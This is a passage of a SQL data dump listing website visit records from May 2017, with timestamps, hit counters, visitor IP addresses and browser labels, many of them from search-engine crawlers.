164.132.161.16','other'),(114075,1495635979,1,0,1,0,'66.249.66.177',''),(114076,1495637403,1,1,0,0,'5.9.11.122','chrome'),(114077,1495637516,1,0,1,0,'66.249.76.91',''),(114078,1495637519,2,0,2,0,'66.249.76.89',''),(114079,1495637546,2,0,2,0,'66.249.76.107',''),(114080,1495637556,3,0,3,0,'66.249.66.81',''),(114081,1495637576,1,1,0,0,'66.249.66.177','chrome'),(114082,1495638435,1,1,0,0,'66.249.93.89','chrome'),(114083,1495638514,1,1,0,0,'51.255.71.101','other'),(114084,1495638768,1,1,0,0,'51.255.71.100','other'),(114085,1495638913,1,1,0,0,'51.255.65.49','other'),(114086,1495639183,2,0,2,0,'66.249.76.109',''),(114087,1495639566,1,1,0,0,'199.16.157.180','other'),(114088,1495639860,1,1,0,0,'217.182.132.63','other'),(114089,1495640150,1,1,0,0,'91.214.84.179','chrome'),(114090,1495640259,1,1,0,0,'157.55.39.135','other'),(114091,1495640560,1,1,0,0,'8.29.198.27','other'),(114092,1495640779,1,1,0,0,'164.132.161.28','other'),(114093,1495640799,1,1,0,0,'66.249.66.182','chrome'),(114094,1495641329,1,1,0,0,'157.55.39.152','other'),(114095,1495642364,1,1,0,0,'157.55.39.152','other'),(114096,1495642405,1,1,0,0,'164.132.161.94','other'),(114097,1495643084,1,1,0,0,'164.132.161.84','other'),(114098,1495643362,1,1,0,0,'91.200.113.190','chrome'),(114099,1495643832,1,1,0,0,'180.76.15.17','other'),(114100,1495644215,1,1,0,0,'51.255.65.62','other'),(114101,1495644363,1,0,1,0,'66.249.76.93',''),(114102,1495644565,1,1,0,0,'217.182.132.72','other'),(114103,1495644648,1,0,1,0,'66.249.66.185',''),(114104,1495644838,1,1,0,0,'51.255.65.15','other'),(114105,1495645048,1,1,0,0,'164.132.161.15','other'),(114106,1495645107,1,1,0,0,'164.132.161.32','other'),(114107,1495646039,1,1,0,0,'51.255.71.115','other'),(114108,1495646050,1,1,0,0,'176.14.252.221','msie'),(114109,1495646115,1,1,0,0,'91.196.178.165','chrome'),(114110,1495646515,1,1,0,0,'217.182.132.177','other'),(114111,1495646706,1,1,0,0,'141.8.142.15','other'),(114112,1495647610,2,2,0,0,'5.255.253.63','other'),(114113,1495647614,2,2,0,0,'141.8.142.15','other'),(114114,1495647621,1,1,0,0,'95.108.213.34','other'),(114115,1495647626,1,1,0,0,'95.108.179.15','other'),(114116,1495647629,1,1,0,0,'87.250.224.18','other'),(114117,1495647679,1,1,0,0,'164.132.161.29','other'),(114118,1495647857,1,1,0,0,'217.182.132.186','other'),(114119,1495647884,1,1,0,0,'157.55.39.135','other'),(114120,1495648045,1,1,0,0,'164.132.161.36','other'),(114121,1495648123,1,1,0,0,'217.182.132.87','other'),(114122,1495648535,1,0,1,0,'68.180.230.48',''),(114123,1495649000,4,0,4,0,'66.249.76.89',''),(114124,1495649010,1,0,1,0,'66.249.76.109',''),(114125,1495649028,1,0,1,0,'66.249.76.108',''),(114126,1495649510,1,1,0,0,'109.236.81.133','chrome'),(114127,1495649702,1,1,0,0,'217.182.132.94','other'),(114128,1495649980,1,1,0,0,'51.255.65.73','other'),(114129,1495650681,1,0,1,0,'66.249.66.188',''),(114130,1495651304,1,1,0,0,'109.236.81.133','chrome'),(114131,1495651390,1,1,0,0,'51.255.65.84','other'),(114132,1495651395,1,1,0,0,'8.29.198.25','other'),(114133,1495651655,1,1,0,0,'91.196.178.166','chrome'),(114134,1495651761,1,0,1,0,'66.249.66.182',''),(114135,1495651766,1,0,1,0,'66.249.76.89',''),(114136,1495652605,1,1,0,0,'46.211.66.158','chrome'),(114137,1495652747,2,0,2,0,'66.249.76.89',''),(114138,1495653104,1,1,0,0,'109.236.81.133','chrome'),(114139,1495653594,1,1,0,0,'217.182.132.60','other'),(114140,1495653631,1,1,0,0,'164.132.161.56','other'),(114141,1495653737,2,2,0,0,'91.196.178.38','chrome'),(114142,1495653902,1,1,0,0,'157.55.39.248','other'),(114143,1495654303,1,1,0,0,'178.95.246.27','chrome'),(114144,1495654314,1,1,0,0,'95.108.213.34','other'),(114145,1495654362,1,0,1,0,'66.249.66.197',''),(114146,1495654813,1,1,0,0,'51.255.65.85','other'),(114147,1495655019,1,0,1,0,'66.249.76.91',''),(114148,1495655041,1,0,1,0,'66.249.76.93',''),(114149,1495655242,1,0,1,0,'66.249.76.108',''),(114150,1495656963,1,1,0,0,'54.165.59.7','other'),(114151,1495657028,1,1,0,0,'164.132.162.164','other'),(114152,1495657165,1,0,1,0,'68.180.231.23',''),(114153,1495657349,1,0,1,0,'66.249.76.109',''),(114154,1495657622,1,0,1,0,'66.249.66.188',''),(114155,1495657716,1,1,0,0,'217.182.132.6','other'),(114156,1495657778,1,0,1,0,'66.249.76.107',''),(114157,1495657964,1,1,0,0,'164.132.161.86','other'),(114158,1495658051,1,1,0,0,'51.255.65.72','other'),(114159,1495658412,1,1,0,0,'217.182.132.5','other'),(114160,1495658413,1,1,0,0,'157.55.39.152','other'),(114161,1495658521,1,1,0,0,'95.153.135.137','chrome'),(114162,1495658529,1,1,0,0,'95.108.213.34','other'),(114163,1495658699,1,0,1,0,'66.249.66.185',''),(114164,1495659195,1,0,1,0,'68.180.230.48',''),(114165,1495659530,1,1,0,0,'137.74.201.108','other'),(114166,1495659534,1,1,0,0,'95.221.56.212','msie'),(114167,1495660277,2,2,0,0,'54.165.59.7','other'),(114168,1495660869,1,1,0,0,'137.74.207.108','other'),(114169,1495661011,1,1,0,0,'51.255.65.97','other'),(114170,1495661161,1,0,1,0,'66.249.76.107',''),(114171,1495661193,1,1,0,0,'51.255.65.224','other'),(114172,1495662054,1,1,0,0,'164.132.161.8','other'),(114173,1495662229,1,1,0,0,'8.29.198.26','other'),(114174,1495662879,1,0,1,0,'66.249.76.108',''),(114175,1495664202,1,0,1,0,'66.249.76.107',''),(114176,1495664357,1,1,0,0,'164.132.161.83','other'),(114177,1495664523,1,1,0,0,'164.132.161.95','other'),(114178,1495666652,1,1,0,0,'164.132.162.155','other'),(114179,1495666762,1,1,0,0,'137.74.203.194','other'),(114180,1495666915,1,1,0,0,'51.255.71.98','other'),(114181,1495667006,1,1,0,0,'176.15.205.231','msie'),(114182,1495667009,1,1,0,0,'176.193.113.99','msie'),(114183,1495668183,2,0,2,0,'66.249.76.93',''),(114184,1495668260,1,1,0,0,'164.132.162.160','other'),(114185,1495668788,1,1,0,0,'217.182.132.149','other'),(114186,1495669783,1,1,0,0,'217.182.132.75','other'),(114187,1495669871,1,0,1,0,'66.249.76.108',''),(114188,1495670067,1,1,0,0,'51.255.65.48','other'),(114189,1495670096,1,1,0,0,'212.237.27.191','msie'),(114190,1495670264,1,1,0,0,'164.132.161.29','other'),(114191,1495670274,1,0,1,0,'66.249.66.157',''),(114192,1495670298,1,0,1,0,'66.249.76.93',''),(114193,1495670480,1,1,0,0,'51.255.64.106','other'),(114194,1495670805,1,1,0,0,'51.255.71.129','other'),(114195,1495670927,1,1,0,0,'51.255.65.54','other'),(114196,1495670989,1,1,0,0,'157.55.39.135','other'),(114197,1495671135,2,0,2,0,'68.180.230.48',''),(114198,1495671305,1,0,1,0,'66.249.76.93',''),(114199,1495671329,1,1,0,0,'51.255.65.39','other'),(114200,1495671861,1,1,0,0,'51.255.65.37','other'),(114201,1495672501,1,1,0,0,'157.55.39.135','other'),(114202,1495672576,1,1,0,0,'51.255.65.54','other'),(114203,1495672651,1,1,0,0,'164.132.161.26','other'),(114204,1495672911,2,2,0,0,'207.46.13.97','other'),(114205,1495673058,1,1,0,0,'8.29.198.25','other'),(114206,1495673102,1,1,0,0,'164.132.161.60','other'),(114207,1495673588,1,1,0,0,'164.132.161.70','other'),(114208,1495673914,1,0,1,0,'66.249.76.109',''),(114209,1495673949,1,0,1,0,'66.249.76.91',''),(114210,1495673991,1,1,0,0,'51.255.65.85','other'),(114211,1495674739,1,1,0,0,'164.132.161.55','other'),(114212,1495674933,1,1,0,0,'51.255.71.110','other'),(114213,1495675000,1,1,0,0,'164.132.161.78','other'),(114214,1495675735,1,1,0,0,'51.255.71.101','other'),(114215,1495676115,1,1,0,0,'157.55.39.152','other'),(114216,1495676426,1,1,0,0,'95.108.213.34','other'),(114217,1495676494,1,1,0,0,'151.80.27.118','other'),(114218,1495676794,1,1,0,0,'51.255.71.100','other'),(114219,1495677049,1,1,0,0,'217.182.132.23','other'),(114220,1495677091,1,0,1,0,'66.249.76.89',''),(114221,1495677105,1,0,1,0,'66.249.66.156',''),(114222,1495677203,1,1,0,0,'217.182.132.25','other'),(114223,1495677340,1,1,0,0,'217.182.132.52','other'),(114224,1495677399,1,1,0,0,'66.249.76.107','chrome'),(114225,1495677411,1,1,0,0,'217.182.132.146','other'),(114226,1495677961,1,1,0,0,'164.132.161.40','other'),(114227,1495678034,1,1,0,0,'164.132.161.62','other'),(114228,1495678102,1,1,0,0,'51.255.71.101','other'),(114229,1495678565,1,1,0,0,'40.77.167.95','other'),(114230,1495679053,1,1,0,0,'137.74.201.99','other'),(114231,1495679226,1,1,0,0,'164.132.161.63','other'),(114232,1495679338,1,1,0,0,'217.182.132.73','other'),(114233,1495680125,1,1,0,0,'217.182.132.191','other'),(114234,1495680181,1,1,0,0,'164.132.161.16','other'),(114235,1495680408,1,1,0,0,'51.255.65.70','other'),(114236,1495680569,1,1,0,0,'51.255.65.81','other'),(114237,1495681068,1,1,0,0,'180.76.15.19','other'),(114238,1495681320,1,1,0,0,'137.74.203.194','other'),(114239,1495681380,1,0,1,0,'66.249.76.93',''),(114240,1495681699,1,1,0,0,'51.255.71.112','other'),(114241,1495681940,1,1,0,0,'217.69.133.67','other'),(114242,1495682102,1,0,1,0,'66.249.76.108',''),(114243,1495682581,1,1,0,0,'217.182.132.172','other'),(114244,1495682617,1,1,0,0,'66.249.76.109','chrome'),(114245,1495682696,1,1,0,0,'217.182.132.173','other'),(114246,1495682857,1,0,1,0,'66.249.76.93',''),(114247,1495682859,1,0,1,0,'66.249.66.158',''),(114248,1495682965,1,1,0,0,'51.255.71.110','other'),(114249,1495683083,1,0,1,0,'66.249.76.89',''),(114250,1495683084,1,0,1,0,'66.249.76.107',''),(114251,1495683506,1,1,0,0,'51.255.65.17','other'),(114252,1495683536,2,0,2,0,'66.249.76.91',''),(114253,1495683738,1,1,0,0,'51.255.65.93','other'),(114254,1495683772,1,0,1,0,'66.249.76.93',''),(114255,1495683890,1,1,0,0,'8.29.198.25','other'),(114256,1495684780,1,0,1,0,'66.249.76.108',''),(114257,1495684834,1,1,0,0,'51.255.65.34','other'),(114258,1495685311,1,0,1,0,'68.180.230.48',''),(114259,1495685362,1,1,0,0,'51.255.65.82','other'),(114260,1495685862,1,1,0,0,'207.46.13.97','other'),(114261,1495685888,1,1,0,0,'217.182.132.179','other'),(114262,1495686277,1,1,0,0,'188.226.170.140','chrome'),(114263,1495686302,1,1,0,0,'141.8.142.15','other'),(114264,1495686811,1,0,1,0,'66.249.76.107',''),(114265,1495687279,1,1,0,0,'185.80.220.39','chrome'),(114266,1495687494,1,1,0,0,'217.182.132.176','other'),(114267,1495687628,1,1,0,0,'164.132.161.5','other'),(114268,1495687822,1,1,0,0,'164.132.161.46','other'),(114269,1495687848,1,1,0,0,'51.255.65.17','other'),(114270,1495688146,1,1,0,0,'51.255.65.28','other'),(114271,1495688199,1,1,0,0,'164.132.164.180','other'),(114272,1495688296,2,0,2,0,'68.180.230.48',''),(114273,1495688754,1,1,0,0,'51.255.65.37','other'),(114274,1495688858,1,1,0,0,'91.196.178.69','firefox'),(114275,1495689074,1,1,0,0,'185.80.220.39','chrome'),(114276,1495689378,1,1,0,0,'51.255.65.35','other'),(114277,1495690153,1,0,1,0,'68.180.230.48',''),(114278,1495690292,1,1,0,0,'51.255.65.48','other'),(114279,1495690874,1,1,0,0,'185.80.220.39','chrome'),(114280,1495691019,1,1,0,0,'91.196.178.68','chrome'),(114281,1495692021,1,1,0,0,'137.74.207.114','other'),(114282,1495692042,1,1,0,0,'178.92.37.17','opera'),(114283,1495692073,1,1,0,0,'51.255.65.57','other'),(114284,1495692100,9,9,0,0,'46.165.197.142','other'),(114285,1495692675,1,1,0,0,'185.80.220.39','chrome'),(114286,1495692676,1,0,1,0,'66.249.76.93',''),(114287,1495693172,1,1,0,0,'217.182.132.180','other'),(114288,1495693553,1,1,0,0,'51.255.65.64','other'),(114289,1495693722,1,1,0,0,'40.77.167.95','other'),(114290,1495694128,1,1,0,0,'51.255.65.31','other'),(114291,1495694474,1,1,0,0,'185.80.220.39','chrome'),(114292,1495694571,1,0,1,0,'66.249.76.109',''),(114293,1495694699,1,1,0,0,'193.200.212.50','chrome'),(114294,1495694734,1,1,0,0,'8.29.198.26','other'),(114295,1495694839,1,1,0,0,'51.255.65.60','other'),(114296,1495694897,1,1,0,0,'137.74.207.102','other'),(114297,1495695383,1,1,0,0,'51.255.65.44','other'),(114298,1495695484,1,1,0,0,'217.182.132.53','other'),(114299,1495695533,1,1,0,0,'217.182.132.35','other'),(114300,1495695713,1,1,0,0,'95.215.156.68','chrome'),(114301,1495695721,1,1,0,0,'164.132.161.54','other'),(114302,1495696065,1,0,1,0,'66.249.66.158',''),(114303,1495696129,30,30,0,0,'185.26.92.74','other'),(114304,1495696250,1,1,0,0,'178.93.33.164','chrome'),(114305,1495696275,1,1,0,0,'185.80.220.39','chrome'),(114306,1495696576,1,1,0,0,'92.112.109.230','chrome'),(114307,1495696861,1,1,0,0,'195.49.151.89','chrome'),(114308,1495696884,1,1,0,0,'95.108.213.34','other'),(114309,1495697061,1,1,0,0,'51.255.65.56','other'),(114310,1495697132,1,0,1,0,'66.249.76.93',''),(114311,1495697136,2,0,2,0,'66.249.66.156',''),(114312,1495697141,2,0,2,0,'66.249.76.89',''),(114313,1495697376,1,1,0,0,'164.132.161.60','other'),(114314,1495698075,1,1,0,0,'185.80.220.39','chrome'),(114315,1495698263,2,2,0,0,'46.165.197.142','other'),(114316,1495698290,1,1,0,0,'217.182.132.95','other'),(114317,1495698327,1,1,0,0,'51.255.71.98','other'),(114318,1495698365,1,1,0,0,'164.132.161.34','other'),(114319,1495698392,1,1,0,0,'51.255.65.67','other'),(114320,1495698558,1,1,0,0,'217.182.132.180','other'),(114321,1495699093,1,1,0,0,'95.133.1.62','chrome'),(114322,1495699199,1,1,0,0,'51.255.65.43','other'),(114323,1495699523,1,1,0,0,'164.132.161.17','other'),(114324,1495699827,1,1,0,0,'51.255.65.45','other'),(114325,1495699875,1,1,0,0,'185.80.220.39','chrome'),(114326,1495699923,1,1,0,0,'164.132.162.160','other'),(114327,1495700113,1,0,1,0,'66.249.66.156',''),(114328,1495700337,1,1,0,0,'137.74.207.164','other'),(114329,1495700364,1,1,0,0,'217.182.132.31','other'),(114330,1495700736,1,1,0,0,'164.132.161.26','other'),(114331,1495700767,1,1,0,0,'66.249.66.195','chrome'),(114332,1495700874,1,1,0,0,'91.196.178.133','firefox'),(114333,1495700917,1,1,0,0,'164.132.161.16','other'),(114334,1495701137,1,1,0,0,'164.132.161.48','other'),(114335,1495701301,1,1,0,0,'164.132.161.88','other'),(114336,1495701345,1,1,0,0,'91.196.178.70','chrome'),(114337,1495701460,1,1,0,0,'164.132.161.5','other'),(114338,1495701663,1,1,0,0,'51.255.65.40','other'),(114339,1495701674,1,1,0,0,'185.80.220.39','chrome'),(114340,1495701688,1,1,0,0,'178.92.85.81','chrome'),(114341,1495701691,1,1,0,0,'5.9.106.230','other'),(114342,1495701839,2,0,2,0,'66.249.76.89',''),(114343,1495701854,2,0,2,0,'66.249.66.156',''),(114344,1495701879,1,1,0,0,'217.182.132.23','other'),(114345,1495701890,1,0,1,0,'66.249.66.195',''),(114346,1495701973,1,1,0,0,'164.132.161.92','other'),(114347,1495702032,1,1,0,0,'164.132.161.9','other'),(114348,1495702266,1,1,0,0,'217.182.132.28','other'),(114349,1495702613,1,0,1,0,'68.180.230.48',''),(114350,1495702617,1,1,0,0,'37.54.133.140','chrome'),(114351,1495702625,1,1,0,0,'217.182.132.177','other'),(114353,1495702710,1,1,0,0,'66.249.76.108','chrome'),(114354,1495702781,1,1,0,0,'37.52.21.197','chrome'),(114355,1495703385,1,0,1,0,'66.249.76.107',''),(114356,1495703474,1,1,0,0,'185.80.220.39','chrome'),(114357,1495703659,1,1,0,0,'37.54.133.140','chrome'),(114358,1495703871,1,1,0,0,'91.196.178.68','chrome'),(114359,1495703926,1,1,0,0,'178.92.33.100','chrome'),(114360,1495704191,1,1,0,0,'51.255.65.13','other'),(114361,1495704720,1,0,1,0,'66.249.76.91',''),(114362,1495704728,1,1,0,0,'46.211.158.215','chrome'),(114363,1495705072,1,1,0,0,'51.255.65.8','other'),(114364,1495705274,1,1,0,0,'185.80.220.39','chrome'),(114365,1495705331,1,1,0,0,'164.132.161.74','other'),(114366,1495705444,1,1,0,0,'91.196.178.68','chrome'),(114367,1495705567,1,1,0,0,'8.29.198.27','other'),(114368,1495705993,1,1,0,0,'51.255.65.17','other'),(114369,1495706140,1,0,1,0,'66.249.76.108',''),(114370,1495706318,1,1,0,0,'51.255.71.128','other'),(114371,1495706389,1,1,0,0,'51.255.65.10','other'),(114372,1495706715,1,0,1,0,'66.249.76.107',''),(114373,1495706784,1,1,0,0,'217.182.132.171','other'),(114374,1495706920,1,1,0,0,'51.255.65.89','other'),(114375,1495706948,2,2,0,0,'46.229.168.66','other'),(114376,1495706959,7,7,0,0,'46.229.168.74','other'),(114377,1495706971,1,0,1,0,'66.249.76.89',''),(114378,1495706973,4,4,0,0,'46.229.168.70','other'),(114379,1495706990,3,3,0,0,'46.229.168.65','other'),(114380,1495707015,3,3,0,0,'46.229.168.75','other'),(114381,1495707032,1,1,0,0,'46.229.168.68','other'),(114382,1495707059,5,5,0,0,'46.229.168.71','other'),(114383,1495707074,1,0,1,0,'66.249.76.109',''),(114384,1495707075,1,1,0,0,'185.80.220.39','chrome'),(114385,1495707170,1,1,0,0,'91.196.177.46','firefox'),(114386,1495707171,3,3,0,0,'46.229.168.72','other'),(114387,1495707213,2,2,0,0,'46.229.168.67','other'),(114388,1495707243,1,1,0,0,'66.249.66.201','chrome'),(114389,1495707328,1,1,0,0,'46.229.168.73','other'),(114390,1495707343,1,1,0,0,'46.229.168.69','other'),(114391,1495707396,1,1,0,0,'157.55.39.135','other'),(114392,1495707482,1,1,0,0,'217.182.132.70','other'),(114393,1495707751,1,1,0,0,'176.195.116.76','other'),(114394,1495707752,1,1,0,0,'37.204.152.166','opera'),(114395,1495707905,1,1,0,0,'164.132.161.56','other'),(114396,1495707992,1,1,0,0,'217.182.132.96','other'),(114397,1495708265,1,1,0,0,'217.182.132.18','other'),(114398,1495708308,1,1,0,0,'217.182.132.170','other'),(114399,1495708329,1,1,0,0,'91.196.178.165','chrome'),(114400,1495708470,1,1,0,0,'91.196.178.70','other'),(114401,1495708536,1,1,0,0,'51.255.65.82','other'),(114402,1495708767,1,1,0,0,'164.132.161.94','other'),(114403,1495708875,1,1,0,0,'185.80.220.39','chrome'),(114404,1495708885,1,1,0,0,'51.255.65.54','other'),(114405,1495709273,1,1,0,0,'137.74.207.119','other'),(114406,1495709309,1,1,0,0,'164.132.161.68','other'),(114407,1495709322,1,0,1,0,'66.249.66.156',''),(114408,1495709733,1,1,0,0,'217.182.132.180','other'),(114409,1495709946,1,0,1,0,'66.249.76.93',''),(114410,1495709984,1,0,1,0,'66.249.76.89',''),(114411,1495710010,1,0,1,0,'66.249.66.158',''),(114412,1495710043,1,1,0,0,'51.255.65.8','other'),(114413,1495710255,1,1,0,0,'164.132.161.52','other'),(114414,1495710299,1,1,0,0,'164.132.161.14','other'),(114415,1495710675,1,1,0,0,'185.80.220.39','chrome'),(114416,1495711040,2,0,2,0,'66.249.76.89',''),(114417,1495711290,1,1,0,0,'51.255.65.33','other'),(114418,1495711385,1,1,0,0,'51.255.65.16','other'),(114419,1495711528,1,1,0,0,'92.113.20.27','firefox'),(114420,1495711709,1,0,1,0,'66.249.76.93',''),(114421,1495711716,1,0,1,0,'66.249.66.157',''),(114422,1495711754,1,1,0,0,'66.249.66.158','chrome'),(114423,1495712268,1,1,0,0,'157.55.39.135','other'),(114424,1495712475,1,1,0,0,'46.219.254.82','chrome'),(114425,1495712841,1,1,0,0,'66.249.76.108','chrome'),(114426,1495712862,1,0,1,0,'66.249.66.199',''),(114427,1495712900,1,0,1,0,'66.249.66.157',''),(114428,1495712904,1,0,1,0,'66.249.76.93',''),(114429,1495712916,1,0,1,0,'66.249.76.89',''),(114430,1495712941,1,1,0,0,'91.196.178.71','chrome'),(114431,1495713059,1,1,0,0,'216.244.66.237','other'),(114432,1495713409,1,0,1,0,'66.249.66.158',''),(114433,1495713584,1,1,0,0,'217.182.132.54','other'),(114434,1495713816,1,1,0,0,'91.196.178.67','firefox'),(114435,1495713833,1,1,0,0,'51.255.71.114','other'),(114436,1495713836,1,1,0,0,'178.92.33.100','chrome'),(114437,1495713838,1,1,0,0,'51.255.65.97','other'),(114438,1495714078,1,1,0,0,'217.182.132.182','other'),(114439,1495714540,1,0,1,0,'66.249.76.108',''),(114440,1495714889,1,1,0,0,'180.76.15.13','other'),(114441,1495715546,1,0,1,0,'66.249.76.89',''),(114442,1495715914,1,0,1,0,'66.249.66.199',''),(114443,1495716398,1,1,0,0,'8.29.198.26','other'),(114444,1495716606,1,1,0,0,'157.55.39.152','other'),(114445,1495717301,1,0,1,0,'68.180.230.48',''),(114446,1495718715,1,1,0,0,'91.196.178.98','opera'),(114447,1495718764,1,1,0,0,'217.69.133.191','other'),(114448,1495719335,1,1,0,0,'91.196.178.68','chrome'),(114449,1495720335,2,2,0,0,'91.196.178.67','firefox'),(114450,1495720412,1,1,0,0,'164.132.161.18','other'),(114451,1495720689,1,1,0,0,'46.101.198.187','other'),(114452,1495720714,1,1,0,0,'212.111.198.100','chrome'),(114453,1495720718,1,1,0,0,'51.255.71.110','other'),(114454,1495720806,1,1,0,0,'217.182.132.69','other'),(114455,1495720864,1,0,1,0,'68.180.230.48',''),(114456,1495721511,2,2,0,0,'91.196.178.70','chrome'),(114457,1495721881,5,0,5,0,'66.249.76.89',''),(114458,1495722530,1,0,1,0,'66.249.66.157',''),(114459,1495723158,1,1,0,0,'82.207.91.234','firefox'),(114460,1495723592,1,1,0,0,'207.46.13.97','other'),(114461,1495724248,1,1,0,0,'95.108.213.34','other'),(114462,1495724370,1,1,0,0,'95.132.133.165','chrome'),(114463,1495724383,2,2,0,0,'91.209.11.236','other'),(114464,1495724529,1,1,0,0,'180.76.15.22','other'),(114465,1495725096,1,1,0,0,'91.196.178.167','chrome'),(114466,1495725565,1,0,1,0,'68.180.230.48',''),(114467,1495725587,1,0,1,0,'66.249.66.201',''),(114468,1495725924,1,1,0,0,'217.182.132.6','other'),(114469,1495726141,1,1,0,0,'95.59.45.9','chrome'),(114470,1495726258,1,1,0,0,'91.196.178.163','chrome'),(114471,1495726403,1,1,0,0,'164.132.161.63','other'),(114472,1495726501,1,1,0,0,'82.145.222.38','other'),(114473,1495726539,1,0,1,0,'68.180.230.48',''),(114474,1495727166,1,1,0,0,'164.132.161.79','other'),(114475,1495727195,2,2,0,0,'91.209.11.236','other'),(114476,1495727229,1,1,0,0,'8.29.198.27','other'),(114477,1495727640,1,1,0,0,'51.255.65.27','other'),(114478,1495727853,1,1,0,0,'217.182.132.24','other'),(114479,1495727927,1,1,0,0,'164.132.161.93','other'),(114480,1495728523,1,1,0,0,'217.182.132.59','other'),(114481,1495728563,4,4,0,0,'91.201.244.115','chrome'),(114482,1495728686,1,0,1,0,'66.249.76.89',''),(114483,1495728862,1,1,0,0,'217.182.132.176','other'),(114484,1495728864,1,1,0,0,'51.255.71.112','other'),(114485,1495729292,2,0,2,0,'66.249.66.156',''),(114486,1495729297,1,0,1,0,'66.249.66.157',''),(114487,1495729342,1,0,1,0,'66.249.76.91',''),(114488,1495729682,1,0,1,0,'66.249.76.89',''),(114489,1495729696,1,1,0,0,'217.182.132.28','other'),(114490,1495729769,1,1,0,0,'217.182.132.18','other'),(114491,1495730018,2,2,0,0,'66.249.76.108','chrome'),(114492,1495730066,1,1,0,0,'37.54.22.100','chrome'),(114493,1495730433,1,0,1,0,'66.249.76.91',''),(114494,1495730534,1,1,0,0,'66.102.9.29','chrome'),(114495,1495730675,1,0,1,0,'66.249.66.201',''),(114496,1495730688,1,1,0,0,'66.249.76.89','chrome'),(114497,1495730756,1,1,0,0,'66.249.66.199','chrome'),(114498,1495731051,1,1,0,0,'164.132.161.21','other'),(114499,1495731190,1,0,1,0,'66.249.66.158',''),(114500,1495731209,1,0,1,0,'66.249.76.108',''),(114501,1495731290,1,0,1,0,'66.249.76.107',''),(114502,1495731575,1,1,0,0,'91.196.178.36','chrome'),(114503,1495731608,1,0,1,0,'66.249.76.91',''),(114504,1495731612,2,1,1,0,'66.249.76.91',''),(114505,1495731616,1,0,1,0,'66.249.76.109',''),(114506,1495731751,1,1,0,0,'207.46.13.97','other'),(114507,1495732069,1,1,0,0,'51.255.65.18','other'),(114508,1495732170,1,0,1,0,'66.249.76.108',''),(114509,1495733352,1,1,0,0,'137.74.207.109','other'),(114510,1495733634,1,1,0,0,'141.8.142.15','other'),(114511,1495733797,1,1,0,0,'66.249.76.107','chrome'),(114512,1495733808,1,1,0,0,'46.73.226.104','msie'),(114513,1495733953,1,1,0,0,'176.31.231.10','other'),(114514,1495734300,1,1,0,0,'164.132.162.188','other'),(114515,1495734912,1,1,0,0,'207.46.13.97','other'),(114516,1495735208,1,1,0,0,'217.69.133.249','other'),(114517,1495735789,1,1,0,0,'217.182.132.183','other'),(114518,1495735815,1,0,1,0,'66.249.66.199',''),(114519,1495735819,1,1,0,0,'51.255.65.58','other'),(114520,1495736171,1,0,1,0,'66.249.76.93',''),(114521,1495736208,1,1,0,0,'217.182.132.155','other'),(114522,1495736962,1,1,0,0,'51.255.65.23','other'),(114523,1495737395,1,1,0,0,'164.132.161.57','other'),(114524,1495737970,1,1,0,0,'51.255.65.45','other'),(114525,1495738001,1,1,0,0,'217.182.132.86','other'),(114526,1495738065,1,1,0,0,'8.29.198.26','other'),(114527,1495738400,1,1,0,0,'164.132.161.17','other'),(114528,1495738622,1,0,1,0,'66.249.76.109',''),(114529,1495738724,1,0,1,0,'66.249.76.107',''),(114530,1495739442,1,1,0,0,'217.182.132.150','other'),(114531,1495740005,1,1,0,0,'217.182.132.157','other'),(114532,1495740152,1,1,0,0,'51.255.71.111','other'),(114533,1495741061,1,1,0,0,'91.196.178.165','chrome'),(114534,1495741827,1,1,0,0,'51.255.65.87','other'),(114535,1495742090,1,0,1,0,'66.249.66.157',''),(114536,1495742285,1,1,0,0,'51.255.65.88','other'),(114537,1495742448,1,0,1,0,'66.249.76.89',''),(114538,1495742468,2,0,2,0,'66.249.76.91',''),(114539,1495742830,1,1,0,0,'217.69.133.238','other'),(114540,1495742874,1,1,0,0,'164.132.161.17','other'),(114541,1495744127,1,1,0,0,'46.219.236.3','chrome'),(114542,1495744814,1,1,0,0,'51.255.65.26','other'),(114543,1495744858,1,1,0,0,'51.255.65.72','other'),(114544,1495745305,1,1,0,0,'217.182.132.53','other'),(114545,1495745680,1,0,1,0,'66.249.76.91',''),(114546,1495745795,1,1,0,0,'217.182.132.28','other'),(114547,1495746164,1,1,0,0,'66.249.76.107','chrome'),(114548,1495746546,1,1,0,0,'51.255.65.13','other'),(114549,1495747075,1,1,0,0,'217.182.132.29','other'),(114550,1495747434,1,1,0,0,'217.182.132.82','other'),(114551,1495747712,1,0,1,0,'66.249.66.158',''),(114552,1495747855,1,1,0,0,'51.255.65.82','other'),(114553,1495747892,1,1,0,0,'217.69.133.10','other'),(114554,1495748307,1,1,0,0,'151.80.27.118','other'),(114555,1495748499,1,1,0,0,'137.74.207.164','other'),(114556,1495748893,1,1,0,0,'8.29.198.27','other'),(114557,1495748952,1,1,0,0,'217.182.132.188','other'),(114558,1495749206,1,1,0,0,'51.255.65.41','other'),(114559,1495749355,1,1,0,0,'164.132.161.8','other'),(114560,1495749893,1,1,0,0,'164.132.161.63','other'),(114561,1495750135,1,0,1,0,'66.249.76.109',''),(114562,1495750391,1,1,0,0,'157.55.39.152','other'),(114563,1495750473,1,1,0,0,'137.74.207.102','other'),(114564,1495750811,1,1,0,0,'157.55.39.135','other'),(114565,1495750933,1,1,0,0,'217.182.132.24','other'),(114566,1495751165,1,1,0,0,'51.255.65.60','other'),(114567,1495751172,1,1,0,0,'51.255.65.69','other'),(114568,1495751743,1,1,0,0,'217.182.132.190','other'),(114569,1495751758,1,1,0,0,'51.255.71.115','other'),(114570,1495751831,1,1,0,0,'164.132.162.154','other'),(114571,1495751840,1,1,0,0,'95.108.179.15','other'),(114572,1495752187,1,0,1,0,'66.249.76.93',''),(114573,1495752190,3,0,3,0,'66.249.76.91',''),(114574,1495752237,1,0,1,0,'66.249.66.156',''),(114575,1495752251,1,0,1,0,'66.249.66.157',''),(114576,1495752258,1,0,1,0,'66.249.76.89',''),(114577,1495752293,1,0,1,0,'66.249.66.201',''),(114578,1495752311,2,1,1,0,'66.249.76.109',''),(114579,1495752315,1,1,0,0,'164.132.161.77','other'),(114580,1495753205,1,0,1,0,'66.249.66.158',''),(114581,1495753509,1,1,0,0,'164.132.161.34','other'),(114582,1495754180,1,1,0,0,'164.132.161.59','other'),(114583,1495754762,1,0,1,0,'66.249.66.156',''),(114584,1495754773,1,0,1,0,'66.249.66.157',''),(114585,1495754781,1,0,1,0,'66.249.66.195',''),(114586,1495754844,1,1,0,0,'217.182.132.95','other'),(114587,1495754984,1,1,0,0,'217.182.132.187','other'),(114588,1495755580,1,1,0,0,'164.132.161.73','other'),(114589,1495755704,1,1,0,0,'217.182.132.51','other'),(114590,1495755976,1,1,0,0,'217.182.132.82','other'),(114591,1495756